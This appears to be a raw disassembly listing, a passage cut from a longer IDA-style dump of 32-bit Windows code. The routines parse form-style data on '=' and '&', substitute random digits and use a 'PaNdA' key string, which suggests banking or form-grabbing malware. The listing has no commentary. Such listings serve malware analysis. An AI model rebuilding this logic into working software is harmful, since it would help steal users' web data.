arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
mov edi, [esi+420h]
push edi
call sub_41DA61
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_41DC15
push 0
push edi
call sub_41DA90
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jnz short loc_41DC15
loc_41DC0E: ; CODE XREF: sub_41DBE5+8E�j
xor al, al
jmp loc_41DCA1
; ---------------------------------------------------------------------------
loc_41DC15: ; CODE XREF: sub_41DBE5+18�j
; sub_41DBE5+27�j
test byte ptr [esi+424h], 1
jnz short loc_41DC4A
mov edx, [ebp+arg_4]
imul eax, 38h
mov ecx, [ebp+arg_8]
mov [esi+42Ch], ecx
mov [esi+428h], edx
mov ecx, dword_4102EC
add ecx, eax
or dword ptr [ecx], 10h
mov ecx, dword_4102EC
mov [eax+ecx+34h], edx
jmp short loc_41DC9F
; ---------------------------------------------------------------------------
loc_41DC4A: ; CODE XREF: sub_41DBE5+37�j
push 28h
push dword ptr [esi+430h]
mov edi, eax
imul edi, 38h
call sub_41A893
pop ecx
pop ecx
mov ecx, dword_4102EC
mov [edi+ecx+34h], eax
mov eax, dword_4102EC
mov ecx, [edi+eax+34h]
test ecx, ecx
jz short loc_41DC0E
mov edx, [ebp+arg_4]
lea eax, [esi+428h]
mov [eax], ecx
mov dword ptr [esi+42Ch], 28h
mov [ecx+14h], edx
mov eax, [eax]
mov ecx, [ebp+arg_8]
mov [eax+18h], ecx
mov eax, dword_4102EC
add eax, edi
or dword ptr [eax], 20h
loc_41DC9F: ; CODE XREF: sub_41DBE5+63�j
mov al, 1
loc_41DCA1: ; CODE XREF: sub_41DBE5+2B�j
pop edi
pop esi
pop ebp
retn
sub_41DBE5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41DCA5 proc near ; CODE XREF: sub_41F4B6+23F�p
var_64 = byte ptr -64h
var_54 = byte ptr -54h
var_44 = byte ptr -44h
var_34 = byte ptr -34h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_3 = byte ptr -3
var_2 = byte ptr -2
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 64h
push edi
mov edi, [ebp+arg_0]
cmp dword ptr [edi+41Ch], 8
jnb short loc_41DCBF
xor al, al
jmp loc_41E0E7
; ---------------------------------------------------------------------------
loc_41DCBF: ; CODE XREF: sub_41DCA5+11�j
and [ebp+var_18], 0
lea eax, [ebp+var_18]
push eax
push 3F6h
call sub_414B1B
cmp eax, 10h
pop ecx
pop ecx
mov [ebp+var_14], eax
mov [ebp+var_3], 0
jbe loc_41E0DB
push esi
mov esi, [ebp+var_18]
loc_41DCE7: ; CODE XREF: sub_41DCA5+11E�j
movzx ecx, word ptr [esi]
sub ecx, [ebp+var_18]
add ecx, esi
cmp ecx, eax
ja loc_41E0DA
movzx eax, word ptr [esi+8]
test ax, ax
jz loc_41DDB1
movzx eax, ax
add eax, esi
push eax
mov [ebp+var_10], eax
call dword_40FD94 ; lstrlenA
mov [ebp+var_1C], eax
xor eax, eax
push eax
push eax
push eax
push dword ptr [edi+400h]
push edi
push [ebp+var_1C]
push [ebp+var_10]
call sub_41A221
add esp, 1Ch
test al, al
jz short loc_41DDB1
movzx eax, word ptr [esi+0Ah]
xor ecx, ecx
cmp ax, cx
jz short loc_41DD6F
push ecx
push ecx
push ecx
push dword ptr [edi+41Ch]
movzx eax, ax
push dword ptr [edi+418h]
add eax, esi
push eax
mov [ebp+var_24], eax
call dword_40FD94 ; lstrlenA
push eax
push [ebp+var_24]
call sub_41A221
add esp, 1Ch
test al, al
jz short loc_41DDB1
xor ecx, ecx
loc_41DD6F: ; CODE XREF: sub_41DCA5+98�j
movzx eax, word ptr [esi+0Ch]
cmp ax, cx
jz short loc_41DDCE
movzx eax, ax
add eax, esi
cmp byte ptr [eax], 2Ah
mov [ebp+var_24], eax
jnz short loc_41DD8B
cmp byte ptr [eax+1], 0
jz short loc_41DDCE
loc_41DD8B: ; CODE XREF: sub_41DCA5+DE�j
push ecx
push ecx
push ecx
push dword ptr [edi+41Ch]
push dword ptr [edi+418h]
push eax
call dword_40FD94 ; lstrlenA
push eax
push [ebp+var_24]
call sub_41A221
add esp, 1Ch
test al, al
jz short loc_41DDCE
loc_41DDB1: ; CODE XREF: sub_41DCA5+59�j
; sub_41DCA5+8D�j ...
movzx eax, word ptr [esi]
add esi, eax
mov eax, [ebp+var_14]
mov ecx, esi
sub ecx, [ebp+var_18]
add ecx, 10h
cmp ecx, eax
jb loc_41DCE7
jmp loc_41E0DA
; ---------------------------------------------------------------------------
loc_41DDCE: ; CODE XREF: sub_41DCA5+D1�j
; sub_41DCA5+E4�j ...
cmp byte ptr [esi+6], 9
jbe short loc_41DDD8
mov byte ptr [esi+6], 0
loc_41DDD8: ; CODE XREF: sub_41DCA5+12D�j
cmp byte ptr [esi+4], 0
jnz short loc_41DDE2
mov byte ptr [esi+4], 1
loc_41DDE2: ; CODE XREF: sub_41DCA5+137�j
mov al, [esi+6]
test al, al
mov [ebp+var_2], al
jnz short loc_41DDF0
mov [ebp+var_2], 6
loc_41DDF0: ; CODE XREF: sub_41DCA5+145�j
mov eax, [edi+418h]
mov edi, [edi+41Ch]
add edi, eax
and [ebp+var_14], 0
mov [ebp+var_20], edi
mov edx, eax
jmp loc_41DEB3
; ---------------------------------------------------------------------------
loc_41DE0C: ; CODE XREF: sub_41DCA5+213�j
cmp byte ptr [eax], 3Dh
jnz loc_41DEB2
movzx ecx, word ptr [esi+0Eh]
test cx, cx
mov [ebp+var_1], 0
jz short loc_41DE4F
movzx edi, cx
xor ecx, ecx
push ecx
push ecx
push ecx
sub eax, edx
push eax
push edx
add edi, esi
push edi
call dword_40FD94 ; lstrlenA
push eax
push edi
call sub_41A221
mov edi, [ebp+var_20]
add esp, 1Ch
test al, al
mov eax, [ebp+var_8]
jnz short loc_41DE4F
mov [ebp+var_1], 1
loc_41DE4F: ; CODE XREF: sub_41DCA5+17B�j
; sub_41DCA5+1A4�j
mov cl, [esi+5]
test cl, cl
jz short loc_41DE64
inc [ebp+var_14]
movzx ecx, cl
cmp ecx, [ebp+var_14]
jz short loc_41DE64
inc [ebp+var_1]
loc_41DE64: ; CODE XREF: sub_41DCA5+1AF�j
; sub_41DCA5+1BA�j
mov edx, eax
mov [ebp+var_C], eax
loc_41DE69: ; CODE XREF: sub_41DCA5+1CF�j
cmp edx, edi
jnb short loc_41DE76
inc edx
cmp byte ptr [edx], 26h
mov [ebp+var_C], edx
jnz short loc_41DE69
loc_41DE76: ; CODE XREF: sub_41DCA5+1C6�j
cmp [ebp+var_1], 0
jnz short loc_41DEAE
movzx ecx, [ebp+var_2]
sub edx, eax
dec edx
cmp edx, ecx
jnz short loc_41DEAE
push ecx
inc eax
push eax
call sub_41A7F9
test al, al
pop ecx
pop ecx
jz short loc_41DEAB
push [ebp+var_1C]
lea eax, [ebp+var_44]
push [ebp+var_10]
push eax
call sub_41B6F9
add esp, 0Ch
test al, al
jnz short loc_41DEC3
loc_41DEAB: ; CODE XREF: sub_41DCA5+1EE�j
mov eax, [ebp+var_8]
loc_41DEAE: ; CODE XREF: sub_41DCA5+1D5�j
; sub_41DCA5+1E0�j
mov edx, [ebp+var_C]
inc edx
loc_41DEB2: ; CODE XREF: sub_41DCA5+16A�j
inc eax
loc_41DEB3: ; CODE XREF: sub_41DCA5+162�j
cmp eax, edi
mov [ebp+var_8], eax
jb loc_41DE0C
jmp loc_41E0DA
; ---------------------------------------------------------------------------
loc_41DEC3: ; CODE XREF: sub_41DCA5+204�j
movzx edi, [ebp+var_2]
inc [ebp+var_8]
push edi
push [ebp+var_8]
lea eax, [ebp+var_34]
push eax
mov [ebp+var_14], edi
call sub_41A857
lea eax, [ebp+var_34]
push eax
mov [ebp+edi+var_34], 0
call sub_41A57A
and [ebp+var_10], 0
mov [ebp+var_20], eax
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_44]
push eax
call sub_41B99C
and [ebp+var_1C], 0
add esp, 18h
test al, 3
mov [ebp+var_C], eax
jz short loc_41DF0E
and [ebp+var_C], 0
loc_41DF0E: ; CODE XREF: sub_41DCA5+263�j
push 4
pop eax
cmp [ebp+var_C], eax
jb short loc_41DF20
mov eax, [ebp+var_10]
mov eax, [eax]
mov [ebp+var_1C], eax
jmp short loc_41DF23
; ---------------------------------------------------------------------------
loc_41DF20: ; CODE XREF: sub_41DCA5+26F�j
mov [ebp+var_C], eax
loc_41DF23: ; CODE XREF: sub_41DCA5+279�j
movzx ecx, byte ptr [esi+4]
mov eax, [ebp+var_1C]
xor edx, edx
div ecx
neg edx
sbb dl, dl
shr [ebp+var_C], 2
xor eax, eax
inc dl
inc eax
cmp [ebp+var_C], eax
mov [ebp+var_1], dl
jbe short loc_41DF60
loc_41DF43: ; CODE XREF: sub_41DCA5+2AD�j
mov ecx, [ebp+var_20]
mov edi, [ebp+var_10]
cmp [edi+eax*4], ecx
jz short loc_41DF56
inc eax
cmp eax, [ebp+var_C]
jb short loc_41DF43
jmp short loc_41DF5D
; ---------------------------------------------------------------------------
loc_41DF56: ; CODE XREF: sub_41DCA5+2A7�j
mov [ebp+var_1], 2
mov dl, [ebp+var_1]
loc_41DF5D: ; CODE XREF: sub_41DCA5+2AF�j
mov edi, [ebp+var_14]
loc_41DF60: ; CODE XREF: sub_41DCA5+29C�j
test dl, dl
jbe short loc_41DFE2
mov eax, [ebp+arg_0]
push dword ptr [eax+41Ch]
push dword ptr [eax+418h]
call sub_41A893
mov edi, eax
test edi, edi
pop ecx
pop ecx
mov [ebp+var_24], edi
jz loc_41E08B
mov eax, [ebp+arg_0]
sub edi, [eax+418h]
add edi, [ebp+var_8]
test byte ptr [esi+2], 1
jz short loc_41DFB5
mov eax, [ebp+var_14]
lea esi, [eax+edi]
jmp short loc_41DFAF
; ---------------------------------------------------------------------------
loc_41DFA1: ; CODE XREF: sub_41DCA5+30C�j
push 39h
push 30h
call sub_41B0BA
pop ecx
mov [edi], al
pop ecx
inc edi
loc_41DFAF: ; CODE XREF: sub_41DCA5+2FA�j
cmp edi, esi
jb short loc_41DFA1
jmp short loc_41DFC3
; ---------------------------------------------------------------------------
loc_41DFB5: ; CODE XREF: sub_41DCA5+2F2�j
push [ebp+var_14]
push 31h
push edi
call sub_41A8BB
add esp, 0Ch
loc_41DFC3: ; CODE XREF: sub_41DCA5+30E�j
mov eax, [ebp+arg_0]
push dword ptr [eax+41Ch]
push [ebp+var_24]
push eax
call sub_41DBE5
add esp, 0Ch
test al, al
jz short loc_41DFF8
mov dl, [ebp+var_1]
mov edi, [ebp+var_14]
loc_41DFE2: ; CODE XREF: sub_41DCA5+2BD�j
cmp dl, 1
mov eax, dword_40FB34
mov [ebp+var_3], 1
jnz short loc_41E006
mov eax, [eax+1B4h]
jmp short loc_41E00C
; ---------------------------------------------------------------------------
loc_41DFF8: ; CODE XREF: sub_41DCA5+335�j
push [ebp+var_24]
call sub_41A83D
pop ecx
jmp loc_41E08B
; ---------------------------------------------------------------------------
loc_41E006: ; CODE XREF: sub_41DCA5+349�j
mov eax, [eax+1B8h]
loc_41E00C: ; CODE XREF: sub_41DCA5+351�j
push eax
mov [ebp+arg_0], eax
call dword_40FD94 ; lstrlenA
mov ecx, [ebx]
mov esi, [ebp+arg_4]
add ecx, edi
mov [ebp+var_14], eax
lea eax, [ecx+eax+14h]
push eax
push esi
call sub_41C8EA
test al, al
pop ecx
pop ecx
jz short loc_41E08B
push edi
push offset a0Uu ; "%%0%uu"
lea eax, [ebp+var_54]
push 0Fh
push eax
call dword_40FC88
push [ebp+var_20]
lea eax, [ebp+var_54]
push eax
lea eax, [ebp+var_64]
push 0Fh
push eax
call dword_40FC88
push [ebp+var_14]
mov eax, [esi]
add eax, [ebx]
push [ebp+arg_0]
push eax
call sub_41A857
mov eax, [ebp+var_14]
add [ebx], eax
mov eax, [ebx]
push edi
lea ecx, [ebp+var_64]
push ecx
mov ecx, [esi]
add ecx, eax
push ecx
call sub_41A857
add [ebx], edi
mov eax, [ebx]
mov ecx, [esi]
add esp, 38h
mov byte ptr [eax+ecx], 0Ah
inc dword ptr [ebx]
loc_41E08B: ; CODE XREF: sub_41DCA5+2DC�j
; sub_41DCA5+35C�j ...
mov esi, [ebp+var_C]
lea eax, [esi+4]
push eax
lea eax, [ebp+var_10]
push eax
call sub_41C8EA
test al, al
pop ecx
pop ecx
jz short loc_41E0D1
cmp [ebp+var_1], 2
jz short loc_41E0B0
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_10]
inc eax
mov [ecx], eax
loc_41E0B0: ; CODE XREF: sub_41DCA5+400�j
mov ecx, [ebp+var_10]
mov edx, [ebp+var_20]
mov eax, esi
shl eax, 2
mov [eax+ecx], edx
add eax, 4
push eax
push [ebp+var_10]
lea eax, [ebp+var_44]
push eax
call sub_41B9E9
add esp, 0Ch
loc_41E0D1: ; CODE XREF: sub_41DCA5+3FA�j
push [ebp+var_10]
call sub_41A83D
pop ecx
loc_41E0DA: ; CODE XREF: sub_41DCA5+4C�j
; sub_41DCA5+124�j ...
pop esi
loc_41E0DB: ; CODE XREF: sub_41DCA5+38�j
push [ebp+var_18]
call sub_41A83D
mov al, [ebp+var_3]
pop ecx
loc_41E0E7: ; CODE XREF: sub_41DCA5+15�j
pop edi
leave
retn
sub_41DCA5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E0EA proc near ; CODE XREF: sub_41F7AC+188�p
; sub_41F7AC+1B3�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
arg_4 = word ptr 0Ch
arg_8 = word ptr 10h
arg_C = word ptr 14h
arg_10 = word ptr 18h
arg_14 = word ptr 1Ch
arg_18 = word ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
sub esp, 18h
push dword ptr [esi+420h]
and [ebp+var_C], 0
and [ebp+var_10], 0
mov [ebp+var_1], 0
call sub_41DA61
cmp eax, 0FFFFFFFFh
pop ecx
jnz loc_41E266
lea eax, [ebp+var_C]
push eax
push [ebp+arg_0]
call sub_414B1B
mov [ebp+var_8], eax
movzx eax, [ebp+arg_4]
cmp [ebp+var_8], eax
pop ecx
pop ecx
jbe loc_41E25D
sub [ebp+var_8], eax
xor eax, eax
cmp byte ptr [esi+404h], 50h
push edi
mov edi, [ebp+var_C]
setnz al
push ebx
inc eax
movzx eax, ax
mov [ebp+var_14], eax
loc_41E14A: ; CODE XREF: sub_41E0EA+168�j
movzx eax, [ebp+arg_8]
mov ax, [eax+edi]
and ax, word ptr [ebp+var_14]
cmp ax, word ptr [ebp+var_14]
jnz loc_41E23B
movzx eax, [ebp+arg_C]
movzx eax, word ptr [eax+edi]
test ax, ax
jz loc_41E23B
movzx ebx, ax
xor eax, eax
push eax
push eax
push eax
push dword ptr [esi+400h]
add ebx, edi
push esi
push ebx
mov [ebp+var_18], ebx
call dword_40FD94 ; lstrlenA
push eax
push ebx
call sub_41A221
add esp, 1Ch
test al, al
jz loc_41E23B
mov ecx, [esi+41Ch]
test ecx, ecx
jz short loc_41E219
movzx eax, [ebp+arg_10]
movzx eax, word ptr [eax+edi]
test ax, ax
jz short loc_41E1DE
movzx ebx, ax
xor eax, eax
push eax
push eax
push eax
push ecx
push dword ptr [esi+418h]
add ebx, edi
push ebx
call dword_40FD94 ; lstrlenA
push eax
push ebx
call sub_41A221
add esp, 1Ch
test al, al
jnz short loc_41E23B
mov ebx, [ebp+var_18]
loc_41E1DE: ; CODE XREF: sub_41E0EA+C9�j
movzx eax, [ebp+arg_14]
movzx eax, word ptr [eax+edi]
test ax, ax
jz short loc_41E219
movzx ebx, ax
xor eax, eax
push eax
push eax
push eax
push dword ptr [esi+41Ch]
add ebx, edi
push dword ptr [esi+418h]
push ebx
call dword_40FD94 ; lstrlenA
push eax
push ebx
call sub_41A221
add esp, 1Ch
test al, al
jz short loc_41E23B
mov ebx, [ebp+var_18]
loc_41E219: ; CODE XREF: sub_41E0EA+BC�j
; sub_41E0EA+FF�j
push 1
push ebx
push offset aPanda2 ; "=-=-PaNdA!$2+)(*"
call sub_41C67A
add esp, 0Ch
test al, al
jnz short loc_41E23B
push edi
push esi
push [ebp+var_10]
call [ebp+arg_1C]
test eax, eax
jg short loc_41E257
jl short loc_41E25B
loc_41E23B: ; CODE XREF: sub_41E0EA+70�j
; sub_41E0EA+81�j ...
movzx eax, [ebp+arg_18]
movzx eax, word ptr [eax+edi]
add edi, eax
mov eax, edi
sub eax, [ebp+var_C]
cmp eax, [ebp+var_8]
jnb short loc_41E25B
inc [ebp+var_10]
jmp loc_41E14A
; ---------------------------------------------------------------------------
loc_41E257: ; CODE XREF: sub_41E0EA+14D�j
mov [ebp+var_1], 1
loc_41E25B: ; CODE XREF: sub_41E0EA+14F�j
; sub_41E0EA+163�j
pop ebx
pop edi
loc_41E25D: ; CODE XREF: sub_41E0EA+3F�j
push [ebp+var_C]
call sub_41A83D
pop ecx
loc_41E266: ; CODE XREF: sub_41E0EA+21�j
mov al, [ebp+var_1]
leave
retn
sub_41E0EA endp
; =============== S U B R O U T I N E =======================================
sub_41E26B proc near ; CODE XREF: .data:0041F13F�p
; sub_41F7AC+47�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, dword_4102F0
push esi
xor esi, esi
cmp eax, esi
jz short loc_41E2DF
cmp dword_4102F4, esi
jz short loc_41E2DF
push esi
push esi
push esi
push [esp+10h+arg_4]
push [esp+14h+arg_0]
push eax
call dword_40FD94 ; lstrlenA
push eax
push dword_4102F0
call sub_41A221
add esp, 1Ch
test al, al
jz short loc_41E2DF
push 1
push dword_4102F4
push offset aPanda2 ; "=-=-PaNdA!$2+)(*"
call sub_41C90A
push dword_4102F0
call sub_41A83D
push dword_4102F4
call sub_41A83D
add esp, 14h
mov dword_4102F0, esi
mov dword_4102F4, esi
mov al, 1
pop esi
retn
; ---------------------------------------------------------------------------
loc_41E2DF: ; CODE XREF: sub_41E26B+A�j
; sub_41E26B+12�j ...
xor al, al
pop esi
retn
sub_41E26B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E2E3 proc near ; CODE XREF: sub_41E2E3+89�p
; sub_41E71F+63F�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0Ch
and [ebp+var_8], 0
push esi
push 4
pop esi
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_8]
push eax
push 1
push [ebp+arg_0]
mov [ebp+var_4], esi
call dword_40FB64
test eax, eax
jz short loc_41E343
cmp [ebp+var_8], 0
jz short loc_41E343
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_C]
push eax
push 2Dh
push [ebp+arg_0]
mov [ebp+var_4], esi
call dword_40FB64
test eax, eax
mov eax, [ebp+var_C]
jnz short loc_41E331
mov eax, [ebp+arg_4]
loc_41E331: ; CODE XREF: sub_41E2E3+49�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push eax
push [ebp+arg_0]
call [ebp+var_8]
jmp short loc_41E374
; ---------------------------------------------------------------------------
loc_41E343: ; CODE XREF: sub_41E2E3+26�j
; sub_41E2E3+2C�j
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+arg_0]
push eax
push 15h
push [ebp+arg_0]
mov [ebp+var_4], esi
call dword_40FB64
test eax, eax
jz short loc_41E374
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41E2E3
add esp, 14h
loc_41E374: ; CODE XREF: sub_41E2E3+5E�j
; sub_41E2E3+78�j
pop esi
leave
retn
sub_41E2E3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41E377 proc near ; CODE XREF: sub_41F7AC+1B9�p
var_410 = byte ptr -410h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 410h
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp [esi+41Ch], ebx
jnz short loc_41E396
xor eax, eax
jmp loc_41E57A
; ---------------------------------------------------------------------------
loc_41E396: ; CODE XREF: sub_41E377+16�j
lea eax, [ebp+var_14]
push eax
push 3F3h
mov [ebp+var_C], ebx
mov [ebp+var_14], ebx
call sub_414B1B
cmp eax, ebx
pop ecx
pop ecx
jz loc_41E577
push eax
push [ebp+var_14]
call sub_41A1D4
test al, al
pop ecx
pop ecx
jz loc_41E56E
push edi
mov edi, [ebp+var_14]
loc_41E3CB: ; CODE XREF: sub_41E377+81�j
push ebx
push ebx
push ebx
push dword ptr [esi+400h]
push esi
push edi
call dword_40FD94 ; lstrlenA
push eax
push edi
call sub_41A221
add esp, 1Ch
test al, al
jnz short loc_41E3FF
push 2
push edi
call sub_41A1FA
mov edi, eax
cmp edi, ebx
pop ecx
pop ecx
jnz short loc_41E3CB
jmp loc_41E56D
; ---------------------------------------------------------------------------
loc_41E3FF: ; CODE XREF: sub_41E377+71�j
push 1
push edi
call sub_41A1FA
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_28], eax
jz loc_41E56D
mov ebx, [esi+418h]
mov edi, [esi+41Ch]
and [ebp+var_10], 0
and [ebp+var_8], 0
add edi, ebx
cmp ebx, edi
mov [ebp+var_1C], edi
jnb loc_41E56D
loc_41E435: ; CODE XREF: sub_41E377+1C1�j
mov ecx, [ebp+var_28]
mov eax, ebx
mov [ebp+var_20], ecx
cmp ebx, edi
jmp short loc_41E449
; ---------------------------------------------------------------------------
loc_41E441: ; CODE XREF: sub_41E377+D5�j
cmp byte ptr [eax], 3Dh
jz short loc_41E44E
inc eax
cmp eax, edi
loc_41E449: ; CODE XREF: sub_41E377+C8�j
mov [ebp+var_18], eax
jb short loc_41E441
loc_41E44E: ; CODE XREF: sub_41E377+CD�j
cmp eax, edi
jz loc_41E547
mov esi, eax
sub esi, ebx
cmp byte ptr [ecx], 0
mov [ebp+var_1], 1
jz short loc_41E4D9
jmp short loc_41E468
; ---------------------------------------------------------------------------
loc_41E465: ; CODE XREF: sub_41E377+154�j
mov ecx, [ebp+var_20]
loc_41E468: ; CODE XREF: sub_41E377+EC�j
mov al, [ecx]
mov edi, ecx
jmp short loc_41E475
; ---------------------------------------------------------------------------
loc_41E46E: ; CODE XREF: sub_41E377+103�j
cmp al, 3Bh
jz short loc_41E47C
inc edi
mov al, [edi]
loc_41E475: ; CODE XREF: sub_41E377+F5�j
test al, al
mov [ebp+var_24], edi
jnz short loc_41E46E
loc_41E47C: ; CODE XREF: sub_41E377+F9�j
sub edi, ecx
push edi
push ecx
lea eax, [ebp+var_410]
push eax
call sub_41A857
push esi
lea eax, [ebp+var_410]
push ebx
push eax
mov [ebp+edi+var_410], 0
call sub_41A857
push edi
push esi
push [ebp+var_20]
mov [ebp+esi+var_410], 0
push ebx
call sub_41A493
add esp, 28h
test eax, eax
jz short loc_41E4CF
mov eax, [ebp+var_24]
cmp byte ptr [eax], 0
jz short loc_41E4D6
inc eax
cmp byte ptr [eax], 0
mov [ebp+var_20], eax
jnz short loc_41E465
jmp short loc_41E4D6
; ---------------------------------------------------------------------------
loc_41E4CF: ; CODE XREF: sub_41E377+143�j
inc [ebp+var_C]
mov [ebp+var_1], 0
loc_41E4D6: ; CODE XREF: sub_41E377+14B�j
; sub_41E377+156�j
mov edi, [ebp+var_1C]
loc_41E4D9: ; CODE XREF: sub_41E377+EA�j
mov esi, [ebp+var_18]
jmp short loc_41E4E7
; ---------------------------------------------------------------------------
loc_41E4DE: ; CODE XREF: sub_41E377+172�j
cmp byte ptr [esi], 26h
jz short loc_41E4EB
inc esi
mov [ebp+var_18], esi
loc_41E4E7: ; CODE XREF: sub_41E377+165�j
cmp esi, edi
jb short loc_41E4DE
loc_41E4EB: ; CODE XREF: sub_41E377+16A�j
cmp [ebp+var_1], 0
jz short loc_41E52F
mov eax, [ebp+var_8]
sub esi, ebx
lea eax, [esi+eax+1]
push eax
lea eax, [ebp+var_10]
push eax
call sub_41C8EA
test al, al
pop ecx
pop ecx
jz short loc_41E540
mov eax, [ebp+var_8]
test eax, eax
jz short loc_41E51C
mov ecx, [ebp+var_10]
mov byte ptr [eax+ecx], 26h
inc eax
mov [ebp+var_8], eax
loc_41E51C: ; CODE XREF: sub_41E377+198�j
mov ecx, [ebp+var_10]
push esi
add eax, ecx
push ebx
push eax
call sub_41A857
add esp, 0Ch
add [ebp+var_8], esi
loc_41E52F: ; CODE XREF: sub_41E377+178�j
mov ebx, [ebp+var_18]
mov esi, [ebp+arg_0]
inc ebx
cmp ebx, edi
jb loc_41E435
jmp short loc_41E547
; ---------------------------------------------------------------------------
loc_41E540: ; CODE XREF: sub_41E377+191�j
and [ebp+var_C], 0
mov esi, [ebp+arg_0]
loc_41E547: ; CODE XREF: sub_41E377+D9�j
; sub_41E377+1C7�j
cmp [ebp+var_C], 0
jz short loc_41E56D
push [ebp+var_8]
push [ebp+var_10]
push esi
call sub_41DBE5
add esp, 0Ch
test al, al
jnz short loc_41E56D
push [ebp+var_10]
and [ebp+var_C], 0
call sub_41A83D
pop ecx
loc_41E56D: ; CODE XREF: sub_41E377+83�j
; sub_41E377+97�j ...
pop edi
loc_41E56E: ; CODE XREF: sub_41E377+4A�j
push [ebp+var_14]
call sub_41A83D
pop ecx
loc_41E577: ; CODE XREF: sub_41E377+37�j
mov eax, [ebp+var_C]
loc_41E57A: ; CODE XREF: sub_41E377+1A�j
pop esi
pop ebx
leave
retn
sub_41E377 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 28h
push esi
push edi
mov edi, [ebp+10h]
movzx esi, word ptr [edi+4]
add esi, edi
test byte ptr [edi+2], 80h
mov [ebp-8], esi
jz short loc_41E5FD
push esi
call dword_40FD94 ; lstrlenA
push eax
lea eax, [ebp-28h]
push esi
push eax
call sub_41B6F9
and dword ptr [ebp+10h], 0
lea eax, [ebp+10h]
push eax
lea eax, [ebp-28h]
push eax
call sub_41B99C
add esp, 14h
cmp eax, 10h
jnz short loc_41E5F3
lea eax, [ebp-18h]
push eax
call dword_40FE8C ; GetSystemTime
mov eax, [ebp+10h]
mov cx, [eax+6]
cmp cx, [ebp-12h]
jnz short loc_41E5F6
mov cx, [eax+2]
cmp cx, [ebp-16h]
jnz short loc_41E5F6
push eax
call sub_41A83D
pop ecx
or eax, 0FFFFFFFFh
jmp loc_41E6F5
; ---------------------------------------------------------------------------
loc_41E5F3: ; CODE XREF: .data:0041E5C1�j
mov eax, [ebp+10h]
loc_41E5F6: ; CODE XREF: .data:0041E5D8�j
; .data:0041E5E2�j
push eax
call sub_41A83D
pop ecx
loc_41E5FD: ; CODE XREF: .data:0041E596�j
and dword ptr [ebp-4], 0
push ebx
lea eax, [ebp-4]
push eax
mov eax, [ebp+8]
add eax, 0FFFFEA60h
push eax
or esi, 0FFFFFFFFh
call sub_414B1B
mov ebx, eax
cmp ebx, 12h
pop ecx
pop ecx
jb loc_41E6F2
mov eax, [ebp+0Ch]
push 1
push dword ptr [eax+420h]
call sub_41DA90
cmp eax, 0FFFFFFFFh
pop ecx
pop ecx
jz loc_41E6F2
imul eax, 38h
add eax, dword_4102EC
mov esi, eax
mov eax, [ebp-4]
mov [esi+20h], eax
mov [esi+24h], ebx
movzx eax, word ptr [edi+0Ch]
test ax, ax
jz short loc_41E66E
movzx eax, ax
add eax, edi
push 0FFFFFFFFh
push eax
call sub_41BC6D
pop ecx
pop ecx
mov [esi+30h], eax
loc_41E66E: ; CODE XREF: .data:0041E65A�j
movzx eax, word ptr [edi+0Ah]
test ax, ax
jz short loc_41E689
movzx eax, ax
add eax, edi
push 0FFFFFFFFh
push eax
call sub_41BC6D
pop ecx
pop ecx
mov [esi+28h], eax
loc_41E689: ; CODE XREF: .data:0041E675�j
cmp dword ptr [esi+28h], 0
jnz short loc_41E695
test byte ptr [edi+2], 80h
jz short loc_41E6A4
loc_41E695: ; CODE XREF: .data:0041E68D�j
push 0FFFFFFFFh
push dword ptr [ebp-8]
call sub_41BC6D
pop ecx
pop ecx
mov [esi+2Ch], eax
loc_41E6A4: ; CODE XREF: .data:0041E693�j
test byte ptr [edi+2], 10h
jz short loc_41E6AD
or dword ptr [esi], 8
loc_41E6AD: ; CODE XREF: .data:0041E6A8�j
test byte ptr [edi+2], 20h
jz short loc_41E6B6
or dword ptr [esi], 40h
loc_41E6B6: ; CODE XREF: .data:0041E6B1�j
test byte ptr [edi+2], 40h
jz short loc_41E6C2
or dword ptr [esi], 80h
loc_41E6C2: ; CODE XREF: .data:0041E6BA�j
test byte ptr [edi+2], 80h
jz short loc_41E6CE
or dword ptr [esi], 100h
loc_41E6CE: ; CODE XREF: .data:0041E6C6�j
mov eax, dword_40FB34
push 80000000h
push 0FFFFFFFFh
push dword ptr [eax+184h]
mov eax, [ebp+0Ch]
push dword ptr [eax+420h]
